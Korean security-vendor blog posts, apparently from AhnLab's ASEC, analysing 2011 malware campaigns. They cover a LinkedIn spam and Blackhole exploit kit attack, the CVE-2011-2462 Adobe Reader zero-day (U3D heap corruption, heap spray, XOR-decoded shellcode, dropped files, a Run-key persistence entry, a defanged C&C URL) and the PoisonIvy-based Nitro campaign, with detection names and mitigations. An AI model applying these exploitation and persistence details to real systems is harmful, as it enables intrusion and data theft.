그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원
한국 시각으로 2011년 12월 7일 새벽 Adobe에서는 보안 권고문 "APSA11-04 Security Advisory for Adobe Reader and Acrobat"을 공개하며 Adobe Acrobat에서 알려지지 않은 제로 데이(Zero-Day) 취약점인 CVE-2011-2462가 발견되었음을 알렸다.

Adobe에서는  이번에 발견된 제로 데이 취약점에 영향을 받는  Adobe Acrobat 버전들은 다음과 같다고 밝히고 있다.

Adobe Reader X (10.1.1) and earlier 10.x versions for Windows and Macintosh
Adobe Reader 9.4.6 and earlier 9.x versions for Windows, Macintosh and UNIX
Adobe Acrobat X (10.1.1) and earlier 10.x versions for Windows and Macintosh
Adobe Acrobat 9.4.6 and earlier 9.x versions for Windows and Macintosh

그리고 보안 권고문을 통해 해당 제로 데이 취약점을 악용한 타겟 공격(Targeted Attack)이 발생하였으며, 해당 취약점을 보고 한 업체로는 미국 군수 방위 업체인 록히드 마틴(Lockheed Martin)으로 밝히고 있다.


이 번 타겟 공격과 관련하여 시만텍(Symantec)에서는 "A New Zero Day PDF Exploit used in a Targeted Attack" 블로그를 통해 이메일의 첨부 파일로 제로 데이 취약점인 CVE-2011-2462이 존재하는 PDF 파일을 전송한 것으로 공개 하였다. 그리고 공격 대상이 된 기업들로는 통신, 제조, 유통, 컴퓨터 하드웨어와 하드웨어 업체들인 것으로 밝히고 있다. 

ASEC에서는 이 번 타겟 공격이 11월 말에서 12월 초를 전후하여 발생한 것으로 추정하고 있으며, 발견된 취약한 PDF 파일은 최소 2개 이상 인것 파악하고 있다.

일반적으로 PDF 파일에는 Universal 3D 파일 포맷같은 3차원 이미지를 포함할 수 있다. U3D 이미지 파일은 일반적인 블럭헤더와 블럭 타입의 특별한 블럭데이터를 가질 수 있는 구조이다.

이 블럭들 중 ShadingModifierBlock은 0xFFFFFF45 값을 가지고, ShadingModifierBlock은 힙
(Heap)에 객체를 생성할 때 사용한다.

이런 오브젝트들의 포인트도 힙에 저장되며 포인터를 위해 메모리에 할당되는 양은 포인터사이즈에 U3D 파일의 Shader List Count 필드를 곱한 것이다. 그러나 포인터는 0xe0형태로 힙 메모리에 초기화되지 않은 상태로 설정 될 경우 이를 악용 가능한 힙 변형이 발생 할 수 있다.

이 번에 발견된 취약한 PDF들은 아래 이미지와 같은 악의적인 3D Stream을 포함하고 있다.

 
해당 악의적인 3D Stream의 압축을 해제하게 되면 아래 이미지와 같은 U3D 파일이 생성되며 붉은 색 박스로 표시된 부분에 의해 실질적인 오버플로우(Overflow)가 발생하게 된다.
 


OpenAction을 통해 취약한 PDF 파일이 실행 될 때 아래 이미지와 같은 14번 오브젝트에서 AcroJS를 포함한 15번 오브젝트 부분의 스크립트를 실행하도록 되어 있다.


15번 오브젝트에는 아래 이미지와 같이  힙 스프레이를 통해 쉘코드를 메모리에 적재하는 AcroJS가 포함되어 있다.


쉘코드는 XOR 97로 디코딩(Decoding)하는 과정을 거쳐 백도어 기능을 수행하는 악성코드를 시스템에 생성하게 된다.


메일로 전달 된 CVE-2011-2462 제로 데이 취약점을 가지고 있는 PDF 파일을 실행하게 되면 아래 이미지와 동일한 내용을 가지고 있는 정상 PDF 파일이 보여진다.


그러나 실제로는 사용자 모르게 다음 파일들이 시스템에 생성되고 실행 된다.

C:\Documents and Settings\[사용자 계정명]\Local Settings\ctfmon.exe
C:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\ManTech Employee Satisfaction Survey.pdf
C:\Documents and Settings\[사용자 계정명]\Local Settings\pretty.exe
C:\Documents and Settings\[사용자 계정명]\Local Settings\WSE4EF1.TMP 


생성된 파일들 중 
ManTech Employee Satisfaction Survey.pdf는 위 이미지와 동일한 취약한 PDF 파일이 실행 될 때 감염된 시스템의 사용자로 하여금 악성코드로 의심하지 못하도록 보여지는 정상 파일이다. 

생성된 
ctfmon.exe(39,936 바이트)는 자신의 복사본을 다시 동일한 위치에 pretty.exe(39,936 바이트)로 생성하며 DLL 파일인 WSE4EF1.TMP(31,232 바이트)를 드롭(Drop) 한다. 해당 파일들 모두 마이크로소프트 비주얼 C++(Microsoft Visual C++)로 제작 되었으며 실행 압축은 되어 있지 않다.

그리고 ctfmon.exe는 다음의 레지스트리(Registry) 키를 생성하여 시스템이 재부팅하더라도 자동 실행하도록 한다.

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
office = 
"C:\Documents and Settings\[사용자 계정명]\Local Settings\pretty.exe"

 
드롭 된  WSE4EF1.TMP는 다음의 프로그램들이 실행되어 프로세스를 생성하게 되면 아래 이미지와 같이 스레드(Thread)로 해당 프로세스에 인젝션(Injection) 하게 된다.

Microsoft Outlook
Microsoft Internet Explorer
Firefox



인젝션에 성공하게 되면 HTTPS로 다음 시스템으로 접속을 시도하게 되나 테스트 당시에는 정상적인 접속이 이루어지지 않았다.

hxxps://www.pr[삭제]her.com/asp/kys[삭제]_get.asp?name=getkys.kys


정상적인 접속이 이루어지게 되면 다음의 악의적인 기능들을 수행하게 되며, 해당 악성코드들은 기존 다른 침해 사고에서 발견되었던 원격 제어 형태의 백도어(Backdoor)이다.

파일 업로드 및 다운로드
CMD Shell 명령 수행
시스템 강제 종료 및 재부팅
프록시(Proxy) 서버 


이번에 발견된 Adobe Acrobat에 존재하는 제로 데이 취약점인 CVE-2011-2462를 악용한 타겟 공격은 취약한 PDF 파일과 감염되는 악성코드 등 전반적인 사항들을 고려하였을때, 공격자는 기업 내부에 존재하는 중요 데이터를 탈취하기 위한 목적으로 제작 및 유포한 것으로 추정된다.

타겟 공격에 실제 악용된
CVE-2011-2462 취약점에 대한 보안 패치는 Adobe에 의해 현지 시각으로 12월 12일 배포 될 예정이나 다른 보안 위협에서 해당 제로 데이 취약점을 악용 할 가능성이 높음으로 각별한 주의가 필요하다.

해당 제로데이 취약점에 대한 임시 대응 방안으로 Adobe에서는 사용하는 Adobe Reader의 버전을 10.0으로 업그레이드 하고 해당 버전에 포함되어 있는 보호 모드(
Protected Mode)와 보호 뷰(Protected View) 기능을 활성화 할 것을 권고하고 있다.

메뉴 → 편집 → 기본 설정 → 일반  → 시작할 때 보호 모드 사용(활성)
 


메뉴 → 편집 → 기본 설정 → 보안(고급)  → 고급 보안 사용(활성)

 

이 번 발견된 Adobe Acrobat에 존재하는 제로 데이 취약점인 CVE-2011-2462을 악용한 악성코드들 모두 V3 제품군에서 다음과 같이 진단하고 있다.

PDF/
CVE-2011-2462
Win-Trojan/Agent.39936.BAT
Backdoor/Win32.CSon
저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원
해외 시각으로 2011년 10월 31일 미국 보안 업체인 시만텍(Symantec)에서는 니트로(Nitro)로 명명된 보안 위협을 공개하였으며, 공개된 니트로 보안 위협에 대해서는 해외 언론들을 통해서도 알려져 있다.

시만텍에서 이번에 공개한 니트로 보안 위협은 화학 제품을 생산하는 기업들을 대상으로한 공격이었으나, 최초인 4월 말경에는 인권 관련단체인 NGO를 대상으로 시작 된 것으로 밝히고 있다. 

화학 업체들을 대상으로한 니트로 보안 위협은 최초 2011년 7월에서 시작되어 해당 보안 위협이 탐지된 9월까지 진행 되었으며, 원격 제어를 위한 C&C(Command and Control) 서버의 경우에는 4월경에 구축 된 것으로 알려져 있다.

그리고 공격 대상이 된 기업은 화학 관련 업체 29개와 군수 업체를 포함한 다른 업종의 기업 19개로 총 48개 기업이 이번 니트로 보안 위협의 공격 대상이 되었다.

시만텍에서는 아래 이미지와 같이 해당 니트로 보안 위협에 의해 감염된 시스템들은 지리적으로 미국과 방글라데시(Bangladesh)가 가장 많은 것으로 밝히고 있다.



이번에 알려진 니트로 보안 위협은 전형적인 APT(Advance Persistent Threat) 형태의 공격으로 사회 공학(Social Engineering) 기법을 포함하고 있는 전자 메일에 원격 제어 형태의 백도어인 포이즌아이비(PoisonIvy)가 첨부 파일로 존재하였다.

니트로 보안 위협에 사용된 포이즌아이비는 언더그라운드에서 해당 백도어를 생성할 수 있는 악성코드 생성기가 이미 공유되고 있어, 니트로 보안 위협의 공격자는 아래 이미지와 유사한 포이즌아이비 툴 킷들을 이용하여 악성코드를 제작한 것으로 추정된다. 


실제 공격에 사용된 악성코드들은 대부분이 RARSfx로 압축된 파일들이며, 해당 파일들이 실행되면 사용자 계정의 Temp 폴더에 자신을 복사본을 생성한다. 

그리고 생성한 복사본은 인터넷 익스플로러(Internet Explorer)의 스레드(Thread)에 자신의 코드를 삽입하여 C&C 서버와 통신을 시도하여, 공격자의 명령에 따라 악의적인 기능을 수행하게 된다.

수행하게 되는 악의적인 기능은 아래 이미지와 같이 감염된 시스템의 실행 중인 프로세스(Process) 리스트에서부터 레지스트리(Registry) 및 키로깅(Keylogging)까지 다양한 악의적인 기능들을 수행 할 수가 있다.


이 번 니트로 보안 위협에 대해 ASEC에서는 추가적인 조사를 진행하여 해당 보안 위협에 악용된 악성코드들이 약 50여개인 것으로 파악하였다.

니트로 보안 위협에 악용된 악성코드들은 모두 V3 제품군에서 다음과 같이 진단하고 있다.

Win-Trojan/Poison.150937
Win-Trojan/Adsagent.141530
Win-Trojan/Poisonivy.135794
Win-Trojan/Poisonivy.150357
Win-Trojan/Poisonivy.133511
Win-Trojan/Poisonivy.154827
Win-Trojan/Poison.155705
Win-Trojan/Adsagent.132031
Win-Trojan/Adsagent.153026
Dropper/Agent.136569
Win-Trojan/Adsagent.7680.E
Win-Trojan/Hupigon.133007
Win-Trojan/Injecter.62464.D
Win-Trojan/Injector.26624.AN
Win-Trojan/Poison.27136.R
Win-Trojan/Poison.154539
Win-Trojan/Injector.3073
Win-Trojan/Agent.159762
Win-Trojan/Bumat.111104
Win-Trojan/Poison.147456 
Win-Trojan/Poison.133951
Win-Trojan/Gendal.62464
Win-Trojan/Injector.89088.AL
Win-Trojan/Poison.43520.P
Win-Trojan/Poisonivy.173068 
Win-Trojan/Poison.111104.M 
Win-Trojan/Injector.89600.BP
Win-Trojan/Magania.3399704
Win-Trojan/Magania.240239 
Win-Trojan/Poisonivy.128204
Win-Trojan/Poison.62464.AA 
Win-Trojan/Poisonivy.177722
Win-Trojan/Poisonivy.150357
PDF/Exploit
Win-Trojan/Downbot.153938
Win-Trojan/Adsagent.141530
Win-Trojan/Poisonivy.154827
Win-Trojan/Adsagent.153026
Dropper/Agent.136569
Win-Trojan/Poisonivy.536397
Win-Trojan/Poisonivy.133511
Win-Trojan/Poisonivy.128405
Win-Trojan/Poisonivy.128204
Win-Trojan/Poisonivy.173068
Win-Trojan/Poison.150937
Win-Trojan/Agent.159762
Win-Trojan/Adsagent.136314
Win-Trojan/Poisonivy.532499
Win-Trojan/Poison.155705
Win-Trojan/Adsagent.132031
Win-Trojan/Poisonivy.128421
Win-Trojan/Poisonivy.135794
 
이러한 APT 형태의 보안 위협에 대응하기 위해서는 단일 보안 제품만으로는 대응이 불가능하며, 사내에 존재하는 보안 정책과 직원들을 대상으로한 보안 인식 교육 그리고 유기적으로 동작하는 각 단계에 맞는 보안 제품들이 다단계적인 대응(Defense in Depth)가 이루어져야 한다.
저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원